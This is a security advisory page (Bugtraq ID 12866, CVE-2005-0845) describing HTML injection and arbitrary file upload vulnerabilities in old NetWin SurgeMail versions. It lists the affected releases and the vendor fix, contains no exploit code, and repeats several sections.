NetWin SurgeMail Multiple Remote HTML Injection and File Upload Vulnerabilities
BID:12866
Info
NetWin SurgeMail Multiple Remote HTML Injection and File Upload Vulnerabilities
| Bugtraq ID: | 12866 |
| Class: | Unknown |
| CVE: |
CVE-2005-0845 |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 22 2005 12:00AM |
| Updated: | Jul 12 2009 10:56AM |
| Credit: | Tan Chew Keong <[email protected]> is credited with the discovery of this issue. |
| Vulnerable: |
NetWin SurgeMail 3.0 a NetWin SurgeMail 2.2 g3 NetWin SurgeMail 2.2 g2 NetWin SurgeMail 2.2 c9 NetWin SurgeMail 2.2 c10 NetWin SurgeMail 2.2 a6 NetWin SurgeMail 2.1 c7 NetWin SurgeMail 2.1 a NetWin SurgeMail 2.0 g2 NetWin SurgeMail 2.0 e NetWin SurgeMail 2.0 c NetWin SurgeMail 2.0 a2 NetWin SurgeMail 1.9 b2 NetWin SurgeMail 1.9 NetWin SurgeMail 1.8 g3 NetWin SurgeMail 1.8 e NetWin SurgeMail 1.8 d NetWin SurgeMail 1.8 b3 NetWin SurgeMail 1.8 a |
| Not Vulnerable: |
NetWin SurgeMail 3.0 c2 |
Discussion
NetWin SurgeMail Multiple Remote HTML Injection and File Upload Vulnerabilities
Multiple remote file upload and HTML injection vulnerabilities affect NetWin SurgeMail. The underlying causes of these issues are a failure ot sanitize user-supplied input and a failure to securely handle the file upload functionality.
These issues may be leverage to upload arbitrary files into arbitrary locations writable to the affected application and carry out HTML injection attacks against the SurgeMail administrator. This may facilitate theft of credentials and potentially compromise of the email server.
Multiple remote file upload and HTML injection vulnerabilities affect NetWin SurgeMail. The underlying causes of these issues are a failure ot sanitize user-supplied input and a failure to securely handle the file upload functionality.
These issues may be leverage to upload arbitrary files into arbitrary locations writable to the affected application and carry out HTML injection attacks against the SurgeMail administrator. This may facilitate theft of credentials and potentially compromise of the email server.
Exploit / POC
NetWin SurgeMail Multiple Remote HTML Injection and File Upload Vulnerabilities
No exploit is required to leverage either of these issues.
No exploit is required to leverage either of these issues.
Solution / Fix
NetWin SurgeMail Multiple Remote HTML Injection and File Upload Vulnerabilities
Solution:
The vendor has released SurgeMail 3.0c2 dealing with this issue. Users are advised to contact the vendor for more information on obtaining upgraded packages.
Solution:
The vendor has released SurgeMail 3.0c2 dealing with this issue. Users are advised to contact the vendor for more information on obtaining upgraded packages.
References
NetWin SurgeMail Multiple Remote HTML Injection and File Upload Vulnerabilities
References:
References:
- SurgeMail Change History (NetWin)
- SurgeMail Home Page (NetWin)
- SurgeMail Webmail Attachment Upload and XSS Vulnerabilities (Tan Chew Keong